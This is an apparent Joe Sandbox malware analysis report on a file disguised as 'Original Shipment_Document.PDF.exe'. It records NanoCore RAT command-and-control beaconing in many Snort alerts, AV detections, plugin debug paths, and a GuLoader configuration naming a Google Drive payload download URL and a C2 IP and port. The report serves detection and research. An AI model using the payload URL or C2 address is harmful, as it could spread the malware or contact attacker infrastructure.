Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT Keep-Alive Beacon - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764982947262816718 08/05/22-11:35:05.845352
SID:	2816718
Source Port:	49829
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764984047262816766 08/05/22-11:36:01.054518
SID:	2816766
Source Port:	49840
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764983047262816766 08/05/22-11:35:13.486265
SID:	2816766
Source Port:	49830
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764987047262816766 08/05/22-11:38:53.408201
SID:	2816766
Source Port:	49870
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764982647262025019 08/05/22-11:34:54.491567
SID:	2025019
Source Port:	49826
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764986547262025019 08/05/22-11:38:16.903783
SID:	2025019
Source Port:	49865
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764980147262816766 08/05/22-11:33:15.747004
SID:	2816766
Source Port:	49801
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764981647262025019 08/05/22-11:34:12.838139
SID:	2025019
Source Port:	49816
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764983547262025019 08/05/22-11:35:29.695360
SID:	2025019
Source Port:	49835
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764985547262025019 08/05/22-11:37:23.336134
SID:	2025019
Source Port:	49855
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764981147262816766 08/05/22-11:33:48.376691
SID:	2816766
Source Port:	49811
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764986047262816766 08/05/22-11:37:48.782972
SID:	2816766
Source Port:	49860
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764985047262816766 08/05/22-11:36:55.558305
SID:	2816766
Source Port:	49850
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.11.20 - Destination IP: 188.127.230.176

Timestamp:	192.168.11.20188.127.230.1764988447262025019 08/05/22-11:39:53.345440
SID:	2025019
Source Port:	49884
Destination Port:	4726
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Original Shipment_Document.PDF.exe	Virustotal: Detection: 32%			Perma Link
Source: Original Shipment_Document.PDF.exe	ReversingLabs: Detection: 22%

Source: 00000088.00000000.185799522780.0000000000E30000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r"}

Source: Original Shipment_Document.PDF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Source: unknown	HTTPS traffic detected: 142.250.179.174:443 -> 192.168.11.20:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49792 version: TLS 1.2

Source: Original Shipment_Document.PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0040683D FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0040290B FindFirstFileW,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\Microsoft.NET\Framework\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\06e54f5fa1f15dd558eaf403cdcacad3\System.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5085e86702d2182b0d9417971c65ded2\System.Drawing.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\ae952be8fa59744d6333aed90b72f162\System.Windows.Forms.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Windows\Microsoft.NET\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49794 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49794 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49794 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49799 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49799 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49801 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49801 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49805 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49805 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 188.127.230.176:4726 -> 192.168.11.20:49805
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49807 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49807 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49808 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49808 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49809 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49809 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49811 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49811 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49812 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49812 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49813 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49813 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49815 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49815 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49815 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49816 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49816 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49819 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49819 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49820 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49820 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49822 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49822 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49823 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49823 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49824 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49824 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49825 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49825 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49826 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 188.127.230.176:4726 -> 192.168.11.20:49826
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49826 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49828 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49828 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49829 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49829 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49829 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49830 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49830 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49831 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49831 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49832 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49832 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 188.127.230.176:4726 -> 192.168.11.20:49832
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49835 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49835 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49836 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49836 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49837 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49837 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49838 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49838 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49839 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49839 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49840 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49840 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49841 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49841 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49841 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49842 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49842 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49843 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49843 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49844 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49844 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49846 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49846 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49847 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49847 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49848 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49848 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49849 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49849 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49850 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49850 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49851 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49851 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49852 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49852 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49852 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49853 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49853 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49854 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49854 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49855 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49855 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 188.127.230.176:4726 -> 192.168.11.20:49855
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49856 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49856 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49857 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49857 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49858 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49858 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49860 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49860 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49861 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49861 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49862 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49862 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49862 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49863 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49863 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49865 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49865 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49866 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49866 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49867 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49867 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49868 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49868 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49869 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49869 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49870 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49870 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49871 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49871 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49872 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 188.127.230.176:4726 -> 192.168.11.20:49872
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49872 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49873 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49873 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49873 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49878 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49878 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49879 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49879 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 188.127.230.176:4726 -> 192.168.11.20:49879
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49880 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49880 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49881 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49881 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49883 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49883 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49884 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49884 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49885 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49885 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49886 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49886 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49887 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49887 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49887 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49888 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49888 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49889 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49889 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49890 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49890 -> 188.127.230.176:4726
